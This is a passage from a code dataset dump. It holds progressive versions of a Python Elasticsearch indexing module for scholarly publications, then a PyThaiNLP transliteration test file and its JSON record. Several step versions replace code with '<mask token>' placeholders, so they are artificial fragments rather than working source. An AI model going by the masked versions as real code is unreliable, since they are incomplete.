e in results['hits'][\n 'hits']])\n not_indexed_dois = set([doi]) - existing_dois\n return list(not_indexed_dois)\n\n\n@exception_handler\ndef update_local_affiliations(index, current_dois, local_affiliations):\n es = get_client()\n logger.debug(\n f'updating with local affiliations {local_affiliations} for {len(current_dois)} dois'\n )\n body = {'script': {'lang': 'painless', 'refresh': True, 'conflicts':\n 'proceed', 'inline':\n 'if (ctx._source.bso_local_affiliations == null) {ctx._source.bso_local_affiliations = new ArrayList();} ctx._source.bso_local_affiliations.addAll(params.local_affiliations);ctx._source.bso_local_affiliations = ctx._source.bso_local_affiliations.stream().distinct().sorted().collect(Collectors.toList())'\n , 'params': {'local_affiliations': local_affiliations}}, 'query': {\n 'bool': {'filter': [{'terms': {'doi.keyword': current_dois}}]}}}\n es.update_by_query(index=index, body=body, request_timeout=60 * 5)\n\n\n@exception_handler\ndef delete_index(index: str) ->None:\n logger.debug(f'Deleting {index}')\n es = get_client()\n response = es.indices.delete(index=index, ignore=[400, 404])\n logger.debug(response)\n\n\n@exception_handler\ndef update_alias(alias: str, old_index: str, new_index: str) ->None:\n es = get_client()\n logger.debug(f'updating alias {alias} from {old_index} to {new_index}')\n response = es.indices.update_aliases({'actions': [{'remove': {'index':\n old_index, 'alias': alias}}, {'add': {'index': new_index, 'alias':\n alias}}]})\n logger.debug(response)\n\n\ndef get_analyzers() ->dict:\n return {'light': {'tokenizer': 'icu_tokenizer', 'filter': ['lowercase',\n 'french_elision', 'icu_folding']}}\n\n\ndef get_filters() ->dict:\n return {'french_elision': {'type': 'elision', 'articles_case': True,\n 'articles': ['l', 'm', 't', 'qu', 'n', 's', 'j', 'd', 'c', 'jusqu',\n 'quoiqu', 'lorsqu', 'puisqu']}}\n\n\n@exception_handler\ndef reset_index(index: str) ->None:\n es = get_client()\n delete_index(index)\n settings = {'analysis': {'filter': get_filters(), 'analyzer':\n get_analyzers()}}\n dynamic_match = None\n if 'bso-publications' in index:\n dynamic_match = None\n elif 'publications-' in index:\n dynamic_match = '*authors'\n mappings = {'properties': {}}\n for f in ['title', 'affiliations.name', 'authors.first_name',\n 'authors.last_name', 'authors.full_name', 'authors.affiliations.name']:\n mappings['properties'][f] 
= {'type': 'text', 'analyzer': 'light'}\n if dynamic_match:\n mappings['dynamic_templates'] = [{'objects': {'match':\n dynamic_match, 'match_mapping_type': 'object', 'mapping': {\n 'type': 'nested'}}}]\n response = es.indices.create(index=index, body={'settings': settings,\n 'mappings': mappings}, ignore=400)\n if 'acknowledged' in response and response['acknowledged']:\n response = str(response['index'])\n logger.debug(f'Index mapping success for index: {response}')\n\n\n@exception_handler\ndef load_in_es(data: list, index: str) ->list:\n es = get_client()\n actions = [{'_index': index, '_source': datum} for datum in data]\n ix = 0\n indexed = []\n for success, info in helpers.parallel_bulk(client=es, actions=actions,\n chunk_size=500, request_timeout=60, raise_on_error=False):\n if not success:\n logger.debug(f'A document failed: {info}')\n else:\n indexed.append(data[ix])\n ix += 1\n logger.debug(f'{len(data)} elements imported into {index}')\n return indexed\n",
"step-5": "from elasticsearch import Elasticsearch, helpers\n\nfrom bso.server.main.config import ES_LOGIN_BSO_BACK, ES_PASSWORD_BSO_BACK, ES_URL\nfrom bso.server.main.decorator import exception_handler\nfrom bso.server.main.logger import get_logger\n\nclient = None\nlogger = get_logger(__name__)\n\n\n@exception_handler\ndef get_client():\n global client\n if client is None:\n client = Elasticsearch(ES_URL, http_auth=(ES_LOGIN_BSO_BACK, ES_PASSWORD_BSO_BACK))\n return client\n\n\n@exception_handler\ndef get_doi_not_in_index(index, dois):\n es = get_client()\n results = es.search(\n index=index,\n body={\"query\": {\"bool\": {\"filter\": [{'terms': {'doi.keyword': dois}}]}}, \"fields\": ['doi'], \"size\": len(dois),\n \"_source\": False},\n request_timeout=60*5\n )\n existing_dois = set([e['fields']['doi'][0] for e in results['hits']['hits']])\n not_indexed_dois = set(dois) - existing_dois\n res = []\n for doi in list(not_indexed_dois):\n res += get_doi_not_in_index_one(index, doi)\n logger.debug(f'{len(res)} dois not in index detected')\n return res\n\n\n@exception_handler\ndef get_doi_not_in_index_one(index, doi):\n es = get_client()\n results = es.search(\n index=index,\n request_cache=False,\n body={\"query\": {\"bool\": {\"filter\": [{'term': {'doi.keyword': doi}}]}}, \"fields\": ['doi'], \"_source\": True},\n request_timeout=60*5\n )\n existing_dois = set([e['fields']['doi'][0] for e in results['hits']['hits']])\n not_indexed_dois = set([doi]) - existing_dois\n return list(not_indexed_dois)\n\n\n@exception_handler\ndef update_local_affiliations(index, current_dois, local_affiliations):\n es = get_client()\n logger.debug(f'updating with local affiliations {local_affiliations} for {len(current_dois)} dois')\n body = {\n \"script\": {\n \"lang\": \"painless\",\n \"refresh\": True,\n \"conflicts\": \"proceed\",\n \"inline\": \"if (ctx._source.bso_local_affiliations == null) {ctx._source.bso_local_affiliations =\"\n \" new ArrayList();} ctx._source.bso_local_affiliations.addAll(params.local_affiliations);\"\n \"ctx._source.bso_local_affiliations = ctx._source.bso_local_affiliations.stream().distinct()\"\n \".sorted().collect(Collectors.toList())\",\n \"params\": {\"local_affiliations\": local_affiliations}\n },\n \"query\": {\n \"bool\": {\n \"filter\": [{\n \"terms\": {\n \"doi.keyword\": current_dois\n }\n }]\n }\n }\n }\n es.update_by_query(index=index, body=body, request_timeout=60*5)\n\n\n@exception_handler\ndef delete_index(index: str) -> None:\n logger.debug(f'Deleting {index}')\n es = get_client()\n response = es.indices.delete(index=index, ignore=[400, 404])\n logger.debug(response)\n\n\n@exception_handler\ndef update_alias(alias: str, old_index: str, new_index: str) -> None:\n es = get_client()\n logger.debug(f'updating alias {alias} from {old_index} to {new_index}')\n response = es.indices.update_aliases({\n 'actions': [\n {'remove': {'index': old_index, 'alias': alias}},\n {'add': {'index': new_index, 'alias': alias}}\n ]\n })\n logger.debug(response)\n\ndef get_analyzers() -> dict:\n return {\n 'light': {\n 'tokenizer': 'icu_tokenizer',\n 'filter': [\n 'lowercase',\n 'french_elision',\n 'icu_folding'\n ]\n }\n }\n\ndef get_filters() -> dict:\n return {\n 'french_elision': {\n 'type': 'elision',\n 'articles_case': True,\n 'articles': ['l', 'm', 't', 'qu', 'n', 's', 'j', 'd', 'c', 'jusqu', 'quoiqu', 'lorsqu', 'puisqu']\n }\n }\n\n@exception_handler\ndef reset_index(index: str) -> None:\n es = get_client()\n delete_index(index)\n \n settings = {\n 'analysis': {\n 'filter': 
get_filters(),\n            'analyzer': get_analyzers()\n        }\n    }\n    \n    dynamic_match = None\n    if 'bso-publications' in index:\n        # dynamic_match = \"*oa_locations\"\n        dynamic_match = None\n    elif 'publications-' in index:\n        dynamic_match = \"*authors\"\n\n    mappings = { 'properties': {} }\n    # warning: the .keyword analyzer will not be present for these fields!\n    for f in ['title', 'affiliations.name', 'authors.first_name', 'authors.last_name', 'authors.full_name', 'authors.affiliations.name']:\n        mappings['properties'][f] = { \n            'type': 'text',\n            'analyzer': 'light' \n        }\n\n    if dynamic_match:\n        mappings[\"dynamic_templates\"] = [\n            {\n                \"objects\": {\n                    \"match\": dynamic_match,\n                    \"match_mapping_type\": \"object\",\n                    \"mapping\": {\n                        \"type\": \"nested\"\n                    }\n                }\n            }\n        ]\n    response = es.indices.create(\n        index=index,\n        body={'settings': settings, 'mappings': mappings},\n        ignore=400  # ignore 400 already exists code\n    )\n    if 'acknowledged' in response and response['acknowledged']:\n        response = str(response['index'])\n    logger.debug(f'Index mapping success for index: {response}')\n\n\n@exception_handler\ndef load_in_es(data: list, index: str) -> list:\n    es = get_client()\n    actions = [{'_index': index, '_source': datum} for datum in data]\n    ix = 0\n    indexed = []\n    for success, info in helpers.parallel_bulk(client=es, actions=actions, chunk_size=500, request_timeout=60,\n                                               raise_on_error=False):\n        if not success:\n            logger.debug(f'A document failed: {info}')\n        else:\n            indexed.append(data[ix])\n        ix += 1\n    logger.debug(f'{len(data)} elements imported into {index}')\n    return indexed\n",
"step-ids": [
7,
8,
9,
11,
13
]
}
|
[
7,
8,
9,
11,
13
] |
# -*- coding: utf-8 -*-
import unittest
import torch
from pythainlp.transliterate import romanize, transliterate, pronunciate, puan
from pythainlp.transliterate.ipa import trans_list, xsampa_list
from pythainlp.transliterate.thai2rom import ThaiTransliterator
from pythainlp.corpus import remove
_BASIC_TESTS = {
None: "",
"": "",
"abc": "abc",
"หมอก": "mok",
"หาย": "hai",
"แมว": "maeo",
"เดือน": "duean",
"ดำ": "dam",
"ดู": "du",
"บัว": "bua",
"กก": "kok",
"พร": "phon",
"กร": "kon",
"กรร": "kan",
"กรรม": "kam",
# "กรม": "krom", # failed
"ฝ้าย": "fai",
"นพพร": "nopphon",
"อัก": "ak",
# "ทีปกร": "thipakon", # failed
# "ธรรพ์": "than", # failed
# "ธรรม": "tham", # failed
# "มหา": "maha", # failed
# "หยาก": "yak", # failed
# "อยาก": "yak", # failed
# "ยมก": "yamok", # failed
# "กลัว": "klua", # failed
# "บ้านไร่": "banrai", # failed
# "ชารินทร์": "charin", # failed
}
# these are set of two-syllable words,
# to test if the transliteration/romanization is consistent, say
# romanize(1+2) = romanize(1) + romanize(2)
_CONSISTENCY_TESTS = [
# ("กระจก", "กระ", "จก"), # failed
# ("ระเบิด", "ระ", "เบิด"), # failed
# ("หยากไย่", "หยาก", "ไย่"), # failed
("ตากใบ", "ตาก", "ใบ"),
# ("จัดสรร", "จัด", "สรร"), # failed
]
class TestTransliteratePackage(unittest.TestCase):
def test_romanize(self):
self.assertEqual(romanize(None), "")
self.assertEqual(romanize(""), "")
self.assertEqual(romanize("แมว"), "maeo")
self.assertEqual(romanize("แมว", engine="tltk"), "maeo")
def test_romanize_royin_basic(self):
for word in _BASIC_TESTS:
expect = _BASIC_TESTS[word]
self.assertEqual(romanize(word, engine="royin"), expect)
def test_romanize_royin_consistency(self):
for word, part1, part2 in _CONSISTENCY_TESTS:
self.assertEqual(
romanize(word, engine="royin"),
(
romanize(part1, engine="royin")
+ romanize(part2, engine="royin")
),
)
def test_romanize_thai2rom(self):
self.assertEqual(romanize("แมว", engine="thai2rom"), "maeo")
self.assertEqual(romanize("บ้านไร่", engine="thai2rom"), "banrai")
self.assertEqual(romanize("สุนัข", engine="thai2rom"), "sunak")
self.assertEqual(romanize("นก", engine="thai2rom"), "nok")
self.assertEqual(romanize("ความอิ่ม", engine="thai2rom"), "khwam-im")
self.assertEqual(
romanize("กานต์ ณรงค์", engine="thai2rom"), "kan narong"
)
self.assertEqual(romanize("สกุนต์", engine="thai2rom"), "sakun")
self.assertEqual(romanize("ชารินทร์", engine="thai2rom"), "charin")
def test_thai2rom_prepare_sequence(self):
transliterater = ThaiTransliterator()
UNK_TOKEN = 1 # UNK_TOKEN or <UNK> is represented by 1
END_TOKEN = 3 # END_TOKEN or <end> is represented by 3
self.assertListEqual(
transliterater._prepare_sequence_in("A")
.cpu()
.detach()
.numpy()
.tolist(),
torch.tensor([UNK_TOKEN, END_TOKEN], dtype=torch.long)
.cpu()
.detach()
.numpy()
.tolist(),
)
self.assertListEqual(
transliterater._prepare_sequence_in("♥")
.cpu()
.detach()
.numpy()
.tolist(),
torch.tensor([UNK_TOKEN, END_TOKEN], dtype=torch.long)
.cpu()
.detach()
.numpy()
.tolist(),
)
self.assertNotEqual(
transliterater._prepare_sequence_in("ก")
.cpu()
.detach()
.numpy()
.tolist(),
torch.tensor([UNK_TOKEN, END_TOKEN], dtype=torch.long)
.cpu()
.detach()
.numpy()
.tolist(),
)
def test_transliterate(self):
self.assertEqual(transliterate(""), "")
self.assertEqual(transliterate("แมว", "pyicu"), "mæw")
self.assertEqual(transliterate("คน", engine="ipa"), "kʰon")
self.assertIsNotNone(transliterate("คน", engine="thaig2p"))
self.assertIsNotNone(transliterate("แมว", engine="thaig2p"))
self.assertIsNotNone(transliterate("คน", engine="tltk_g2p"))
self.assertIsNotNone(transliterate("แมว", engine="tltk_g2p"))
self.assertIsNotNone(transliterate("คน", engine="tltk_ipa"))
self.assertIsNotNone(transliterate("แมว", engine="tltk_ipa"))
self.assertIsNotNone(trans_list("คน"))
self.assertIsNotNone(xsampa_list("คน"))
def test_pronunciate(self):
self.assertEqual(pronunciate(""), "")
remove("thai_w2p")
self.assertIsNotNone(pronunciate("คน", engine="w2p"))
self.assertIsNotNone(pronunciate("แมว", engine="w2p"))
self.assertIsNotNone(pronunciate("มข.", engine="w2p"))
self.assertIsNotNone(pronunciate("มช.", engine="w2p"))
self.assertIsNotNone(pronunciate("jks", engine="w2p"))
def test_puan(self):
self.assertEqual(puan("นาริน"), "นิน-รา")
self.assertEqual(puan("นาริน", False), "นินรา")
self.assertEqual(puan("แสงดีนะ"), "แสง-ดะ-นี")
self.assertEqual(puan("แสงดีนะ", False), "แสงดะนี")
with self.assertRaises(ValueError):
self.assertEqual(puan("สวัสดีครับ"), "สวัสดีครับ")
|
normal
|
{
"blob_id": "486cfc4bb4b46d78715b11cba44656e8ba077c9b",
"index": 2551,
"step-1": "<mask token>\n\n\nclass TestTransliteratePackage(unittest.TestCase):\n <mask token>\n\n def test_romanize_royin_basic(self):\n for word in _BASIC_TESTS:\n expect = _BASIC_TESTS[word]\n self.assertEqual(romanize(word, engine='royin'), expect)\n\n def test_romanize_royin_consistency(self):\n for word, part1, part2 in _CONSISTENCY_TESTS:\n self.assertEqual(romanize(word, engine='royin'), romanize(part1,\n engine='royin') + romanize(part2, engine='royin'))\n\n def test_romanize_thai2rom(self):\n self.assertEqual(romanize('แมว', engine='thai2rom'), 'maeo')\n self.assertEqual(romanize('บ้านไร่', engine='thai2rom'), 'banrai')\n self.assertEqual(romanize('สุนัข', engine='thai2rom'), 'sunak')\n self.assertEqual(romanize('นก', engine='thai2rom'), 'nok')\n self.assertEqual(romanize('ความอิ่ม', engine='thai2rom'), 'khwam-im')\n self.assertEqual(romanize('กานต์ ณรงค์', engine='thai2rom'),\n 'kan narong')\n self.assertEqual(romanize('สกุนต์', engine='thai2rom'), 'sakun')\n self.assertEqual(romanize('ชารินทร์', engine='thai2rom'), 'charin')\n\n def test_thai2rom_prepare_sequence(self):\n transliterater = ThaiTransliterator()\n UNK_TOKEN = 1\n END_TOKEN = 3\n self.assertListEqual(transliterater._prepare_sequence_in('A').cpu()\n .detach().numpy().tolist(), torch.tensor([UNK_TOKEN, END_TOKEN],\n dtype=torch.long).cpu().detach().numpy().tolist())\n self.assertListEqual(transliterater._prepare_sequence_in('♥').cpu()\n .detach().numpy().tolist(), torch.tensor([UNK_TOKEN, END_TOKEN],\n dtype=torch.long).cpu().detach().numpy().tolist())\n self.assertNotEqual(transliterater._prepare_sequence_in('ก').cpu().\n detach().numpy().tolist(), torch.tensor([UNK_TOKEN, END_TOKEN],\n dtype=torch.long).cpu().detach().numpy().tolist())\n <mask token>\n\n def test_pronunciate(self):\n self.assertEqual(pronunciate(''), '')\n remove('thai_w2p')\n self.assertIsNotNone(pronunciate('คน', engine='w2p'))\n self.assertIsNotNone(pronunciate('แมว', engine='w2p'))\n self.assertIsNotNone(pronunciate('มข.', engine='w2p'))\n self.assertIsNotNone(pronunciate('มช.', engine='w2p'))\n self.assertIsNotNone(pronunciate('jks', engine='w2p'))\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass TestTransliteratePackage(unittest.TestCase):\n <mask token>\n\n def test_romanize_royin_basic(self):\n for word in _BASIC_TESTS:\n expect = _BASIC_TESTS[word]\n self.assertEqual(romanize(word, engine='royin'), expect)\n\n def test_romanize_royin_consistency(self):\n for word, part1, part2 in _CONSISTENCY_TESTS:\n self.assertEqual(romanize(word, engine='royin'), romanize(part1,\n engine='royin') + romanize(part2, engine='royin'))\n\n def test_romanize_thai2rom(self):\n self.assertEqual(romanize('แมว', engine='thai2rom'), 'maeo')\n self.assertEqual(romanize('บ้านไร่', engine='thai2rom'), 'banrai')\n self.assertEqual(romanize('สุนัข', engine='thai2rom'), 'sunak')\n self.assertEqual(romanize('นก', engine='thai2rom'), 'nok')\n self.assertEqual(romanize('ความอิ่ม', engine='thai2rom'), 'khwam-im')\n self.assertEqual(romanize('กานต์ ณรงค์', engine='thai2rom'),\n 'kan narong')\n self.assertEqual(romanize('สกุนต์', engine='thai2rom'), 'sakun')\n self.assertEqual(romanize('ชารินทร์', engine='thai2rom'), 'charin')\n\n def test_thai2rom_prepare_sequence(self):\n transliterater = ThaiTransliterator()\n UNK_TOKEN = 1\n END_TOKEN = 3\n self.assertListEqual(transliterater._prepare_sequence_in('A').cpu()\n .detach().numpy().tolist(), torch.tensor([UNK_TOKEN, END_TOKEN],\n dtype=torch.long).cpu().detach().numpy().tolist())\n self.assertListEqual(transliterater._prepare_sequence_in('♥').cpu()\n .detach().numpy().tolist(), torch.tensor([UNK_TOKEN, END_TOKEN],\n dtype=torch.long).cpu().detach().numpy().tolist())\n self.assertNotEqual(transliterater._prepare_sequence_in('ก').cpu().\n detach().numpy().tolist(), torch.tensor([UNK_TOKEN, END_TOKEN],\n dtype=torch.long).cpu().detach().numpy().tolist())\n\n def test_transliterate(self):\n self.assertEqual(transliterate(''), '')\n self.assertEqual(transliterate('แมว', 'pyicu'), 'mæw')\n self.assertEqual(transliterate('คน', engine='ipa'), 'kʰon')\n self.assertIsNotNone(transliterate('คน', engine='thaig2p'))\n self.assertIsNotNone(transliterate('แมว', engine='thaig2p'))\n self.assertIsNotNone(transliterate('คน', engine='tltk_g2p'))\n self.assertIsNotNone(transliterate('แมว', engine='tltk_g2p'))\n self.assertIsNotNone(transliterate('คน', engine='tltk_ipa'))\n self.assertIsNotNone(transliterate('แมว', engine='tltk_ipa'))\n self.assertIsNotNone(trans_list('คน'))\n self.assertIsNotNone(xsampa_list('คน'))\n\n def test_pronunciate(self):\n self.assertEqual(pronunciate(''), '')\n remove('thai_w2p')\n self.assertIsNotNone(pronunciate('คน', engine='w2p'))\n self.assertIsNotNone(pronunciate('แมว', engine='w2p'))\n self.assertIsNotNone(pronunciate('มข.', engine='w2p'))\n self.assertIsNotNone(pronunciate('มช.', engine='w2p'))\n self.assertIsNotNone(pronunciate('jks', engine='w2p'))\n\n def test_puan(self):\n self.assertEqual(puan('นาริน'), 'นิน-รา')\n self.assertEqual(puan('นาริน', False), 'นินรา')\n self.assertEqual(puan('แสงดีนะ'), 'แสง-ดะ-นี')\n self.assertEqual(puan('แสงดีนะ', False), 'แสงดะนี')\n with self.assertRaises(ValueError):\n self.assertEqual(puan('สวัสดีครับ'), 'สวัสดีครับ')\n",
"step-3": "<mask token>\n_BASIC_TESTS = {None: '', '': '', 'abc': 'abc', 'หมอก': 'mok', 'หาย': 'hai',\n 'แมว': 'maeo', 'เดือน': 'duean', 'ดำ': 'dam', 'ดู': 'du', 'บัว': 'bua',\n 'กก': 'kok', 'พร': 'phon', 'กร': 'kon', 'กรร': 'kan', 'กรรม': 'kam',\n 'ฝ้าย': 'fai', 'นพพร': 'nopphon', 'อัก': 'ak'}\n_CONSISTENCY_TESTS = [('ตากใบ', 'ตาก', 'ใบ')]\n\n\nclass TestTransliteratePackage(unittest.TestCase):\n\n def test_romanize(self):\n self.assertEqual(romanize(None), '')\n self.assertEqual(romanize(''), '')\n self.assertEqual(romanize('แมว'), 'maeo')\n self.assertEqual(romanize('แมว', engine='tltk'), 'maeo')\n\n def test_romanize_royin_basic(self):\n for word in _BASIC_TESTS:\n expect = _BASIC_TESTS[word]\n self.assertEqual(romanize(word, engine='royin'), expect)\n\n def test_romanize_royin_consistency(self):\n for word, part1, part2 in _CONSISTENCY_TESTS:\n self.assertEqual(romanize(word, engine='royin'), romanize(part1,\n engine='royin') + romanize(part2, engine='royin'))\n\n def test_romanize_thai2rom(self):\n self.assertEqual(romanize('แมว', engine='thai2rom'), 'maeo')\n self.assertEqual(romanize('บ้านไร่', engine='thai2rom'), 'banrai')\n self.assertEqual(romanize('สุนัข', engine='thai2rom'), 'sunak')\n self.assertEqual(romanize('นก', engine='thai2rom'), 'nok')\n self.assertEqual(romanize('ความอิ่ม', engine='thai2rom'), 'khwam-im')\n self.assertEqual(romanize('กานต์ ณรงค์', engine='thai2rom'),\n 'kan narong')\n self.assertEqual(romanize('สกุนต์', engine='thai2rom'), 'sakun')\n self.assertEqual(romanize('ชารินทร์', engine='thai2rom'), 'charin')\n\n def test_thai2rom_prepare_sequence(self):\n transliterater = ThaiTransliterator()\n UNK_TOKEN = 1\n END_TOKEN = 3\n self.assertListEqual(transliterater._prepare_sequence_in('A').cpu()\n .detach().numpy().tolist(), torch.tensor([UNK_TOKEN, END_TOKEN],\n dtype=torch.long).cpu().detach().numpy().tolist())\n self.assertListEqual(transliterater._prepare_sequence_in('♥').cpu()\n .detach().numpy().tolist(), torch.tensor([UNK_TOKEN, END_TOKEN],\n dtype=torch.long).cpu().detach().numpy().tolist())\n self.assertNotEqual(transliterater._prepare_sequence_in('ก').cpu().\n detach().numpy().tolist(), torch.tensor([UNK_TOKEN, END_TOKEN],\n dtype=torch.long).cpu().detach().numpy().tolist())\n\n def test_transliterate(self):\n self.assertEqual(transliterate(''), '')\n self.assertEqual(transliterate('แมว', 'pyicu'), 'mæw')\n self.assertEqual(transliterate('คน', engine='ipa'), 'kʰon')\n self.assertIsNotNone(transliterate('คน', engine='thaig2p'))\n self.assertIsNotNone(transliterate('แมว', engine='thaig2p'))\n self.assertIsNotNone(transliterate('คน', engine='tltk_g2p'))\n self.assertIsNotNone(transliterate('แมว', engine='tltk_g2p'))\n self.assertIsNotNone(transliterate('คน', engine='tltk_ipa'))\n self.assertIsNotNone(transliterate('แมว', engine='tltk_ipa'))\n self.assertIsNotNone(trans_list('คน'))\n self.assertIsNotNone(xsampa_list('คน'))\n\n def test_pronunciate(self):\n self.assertEqual(pronunciate(''), '')\n remove('thai_w2p')\n self.assertIsNotNone(pronunciate('คน', engine='w2p'))\n self.assertIsNotNone(pronunciate('แมว', engine='w2p'))\n self.assertIsNotNone(pronunciate('มข.', engine='w2p'))\n self.assertIsNotNone(pronunciate('มช.', engine='w2p'))\n self.assertIsNotNone(pronunciate('jks', engine='w2p'))\n\n def test_puan(self):\n self.assertEqual(puan('นาริน'), 'นิน-รา')\n self.assertEqual(puan('นาริน', False), 'นินรา')\n self.assertEqual(puan('แสงดีนะ'), 'แสง-ดะ-นี')\n self.assertEqual(puan('แสงดีนะ', False), 'แสงดะนี')\n with self.assertRaises(ValueError):\n 
self.assertEqual(puan('สวัสดีครับ'), 'สวัสดีครับ')\n",
"step-4": "import unittest\nimport torch\nfrom pythainlp.transliterate import romanize, transliterate, pronunciate, puan\nfrom pythainlp.transliterate.ipa import trans_list, xsampa_list\nfrom pythainlp.transliterate.thai2rom import ThaiTransliterator\nfrom pythainlp.corpus import remove\n_BASIC_TESTS = {None: '', '': '', 'abc': 'abc', 'หมอก': 'mok', 'หาย': 'hai',\n 'แมว': 'maeo', 'เดือน': 'duean', 'ดำ': 'dam', 'ดู': 'du', 'บัว': 'bua',\n 'กก': 'kok', 'พร': 'phon', 'กร': 'kon', 'กรร': 'kan', 'กรรม': 'kam',\n 'ฝ้าย': 'fai', 'นพพร': 'nopphon', 'อัก': 'ak'}\n_CONSISTENCY_TESTS = [('ตากใบ', 'ตาก', 'ใบ')]\n\n\nclass TestTransliteratePackage(unittest.TestCase):\n\n def test_romanize(self):\n self.assertEqual(romanize(None), '')\n self.assertEqual(romanize(''), '')\n self.assertEqual(romanize('แมว'), 'maeo')\n self.assertEqual(romanize('แมว', engine='tltk'), 'maeo')\n\n def test_romanize_royin_basic(self):\n for word in _BASIC_TESTS:\n expect = _BASIC_TESTS[word]\n self.assertEqual(romanize(word, engine='royin'), expect)\n\n def test_romanize_royin_consistency(self):\n for word, part1, part2 in _CONSISTENCY_TESTS:\n self.assertEqual(romanize(word, engine='royin'), romanize(part1,\n engine='royin') + romanize(part2, engine='royin'))\n\n def test_romanize_thai2rom(self):\n self.assertEqual(romanize('แมว', engine='thai2rom'), 'maeo')\n self.assertEqual(romanize('บ้านไร่', engine='thai2rom'), 'banrai')\n self.assertEqual(romanize('สุนัข', engine='thai2rom'), 'sunak')\n self.assertEqual(romanize('นก', engine='thai2rom'), 'nok')\n self.assertEqual(romanize('ความอิ่ม', engine='thai2rom'), 'khwam-im')\n self.assertEqual(romanize('กานต์ ณรงค์', engine='thai2rom'),\n 'kan narong')\n self.assertEqual(romanize('สกุนต์', engine='thai2rom'), 'sakun')\n self.assertEqual(romanize('ชารินทร์', engine='thai2rom'), 'charin')\n\n def test_thai2rom_prepare_sequence(self):\n transliterater = ThaiTransliterator()\n UNK_TOKEN = 1\n END_TOKEN = 3\n self.assertListEqual(transliterater._prepare_sequence_in('A').cpu()\n .detach().numpy().tolist(), torch.tensor([UNK_TOKEN, END_TOKEN],\n dtype=torch.long).cpu().detach().numpy().tolist())\n self.assertListEqual(transliterater._prepare_sequence_in('♥').cpu()\n .detach().numpy().tolist(), torch.tensor([UNK_TOKEN, END_TOKEN],\n dtype=torch.long).cpu().detach().numpy().tolist())\n self.assertNotEqual(transliterater._prepare_sequence_in('ก').cpu().\n detach().numpy().tolist(), torch.tensor([UNK_TOKEN, END_TOKEN],\n dtype=torch.long).cpu().detach().numpy().tolist())\n\n def test_transliterate(self):\n self.assertEqual(transliterate(''), '')\n self.assertEqual(transliterate('แมว', 'pyicu'), 'mæw')\n self.assertEqual(transliterate('คน', engine='ipa'), 'kʰon')\n self.assertIsNotNone(transliterate('คน', engine='thaig2p'))\n self.assertIsNotNone(transliterate('แมว', engine='thaig2p'))\n self.assertIsNotNone(transliterate('คน', engine='tltk_g2p'))\n self.assertIsNotNone(transliterate('แมว', engine='tltk_g2p'))\n self.assertIsNotNone(transliterate('คน', engine='tltk_ipa'))\n self.assertIsNotNone(transliterate('แมว', engine='tltk_ipa'))\n self.assertIsNotNone(trans_list('คน'))\n self.assertIsNotNone(xsampa_list('คน'))\n\n def test_pronunciate(self):\n self.assertEqual(pronunciate(''), '')\n remove('thai_w2p')\n self.assertIsNotNone(pronunciate('คน', engine='w2p'))\n self.assertIsNotNone(pronunciate('แมว', engine='w2p'))\n self.assertIsNotNone(pronunciate('มข.', engine='w2p'))\n self.assertIsNotNone(pronunciate('มช.', engine='w2p'))\n self.assertIsNotNone(pronunciate('jks', engine='w2p'))\n\n 
def test_puan(self):\n self.assertEqual(puan('นาริน'), 'นิน-รา')\n self.assertEqual(puan('นาริน', False), 'นินรา')\n self.assertEqual(puan('แสงดีนะ'), 'แสง-ดะ-นี')\n self.assertEqual(puan('แสงดีนะ', False), 'แสงดะนี')\n with self.assertRaises(ValueError):\n self.assertEqual(puan('สวัสดีครับ'), 'สวัสดีครับ')\n",
"step-5": "# -*- coding: utf-8 -*-\n\nimport unittest\n\nimport torch\nfrom pythainlp.transliterate import romanize, transliterate, pronunciate, puan\nfrom pythainlp.transliterate.ipa import trans_list, xsampa_list\nfrom pythainlp.transliterate.thai2rom import ThaiTransliterator\nfrom pythainlp.corpus import remove\n\n_BASIC_TESTS = {\n None: \"\",\n \"\": \"\",\n \"abc\": \"abc\",\n \"หมอก\": \"mok\",\n \"หาย\": \"hai\",\n \"แมว\": \"maeo\",\n \"เดือน\": \"duean\",\n \"ดำ\": \"dam\",\n \"ดู\": \"du\",\n \"บัว\": \"bua\",\n \"กก\": \"kok\",\n \"พร\": \"phon\",\n \"กร\": \"kon\",\n \"กรร\": \"kan\",\n \"กรรม\": \"kam\",\n # \"กรม\": \"krom\", # failed\n \"ฝ้าย\": \"fai\",\n \"นพพร\": \"nopphon\",\n \"อัก\": \"ak\",\n # \"ทีปกร\": \"thipakon\", # failed\n # \"ธรรพ์\": \"than\", # failed\n # \"ธรรม\": \"tham\", # failed\n # \"มหา\": \"maha\", # failed\n # \"หยาก\": \"yak\", # failed\n # \"อยาก\": \"yak\", # failed\n # \"ยมก\": \"yamok\", # failed\n # \"กลัว\": \"klua\", # failed\n # \"บ้านไร่\": \"banrai\", # failed\n # \"ชารินทร์\": \"charin\", # failed\n}\n\n# these are set of two-syllable words,\n# to test if the transliteration/romanization is consistent, say\n# romanize(1+2) = romanize(1) + romanize(2)\n_CONSISTENCY_TESTS = [\n # (\"กระจก\", \"กระ\", \"จก\"), # failed\n # (\"ระเบิด\", \"ระ\", \"เบิด\"), # failed\n # (\"หยากไย่\", \"หยาก\", \"ไย่\"), # failed\n (\"ตากใบ\", \"ตาก\", \"ใบ\"),\n # (\"จัดสรร\", \"จัด\", \"สรร\"), # failed\n]\n\n\nclass TestTransliteratePackage(unittest.TestCase):\n def test_romanize(self):\n self.assertEqual(romanize(None), \"\")\n self.assertEqual(romanize(\"\"), \"\")\n self.assertEqual(romanize(\"แมว\"), \"maeo\")\n self.assertEqual(romanize(\"แมว\", engine=\"tltk\"), \"maeo\")\n\n def test_romanize_royin_basic(self):\n for word in _BASIC_TESTS:\n expect = _BASIC_TESTS[word]\n self.assertEqual(romanize(word, engine=\"royin\"), expect)\n\n def test_romanize_royin_consistency(self):\n for word, part1, part2 in _CONSISTENCY_TESTS:\n self.assertEqual(\n romanize(word, engine=\"royin\"),\n (\n romanize(part1, engine=\"royin\")\n + romanize(part2, engine=\"royin\")\n ),\n )\n\n def test_romanize_thai2rom(self):\n self.assertEqual(romanize(\"แมว\", engine=\"thai2rom\"), \"maeo\")\n self.assertEqual(romanize(\"บ้านไร่\", engine=\"thai2rom\"), \"banrai\")\n self.assertEqual(romanize(\"สุนัข\", engine=\"thai2rom\"), \"sunak\")\n self.assertEqual(romanize(\"นก\", engine=\"thai2rom\"), \"nok\")\n self.assertEqual(romanize(\"ความอิ่ม\", engine=\"thai2rom\"), \"khwam-im\")\n self.assertEqual(\n romanize(\"กานต์ ณรงค์\", engine=\"thai2rom\"), \"kan narong\"\n )\n self.assertEqual(romanize(\"สกุนต์\", engine=\"thai2rom\"), \"sakun\")\n 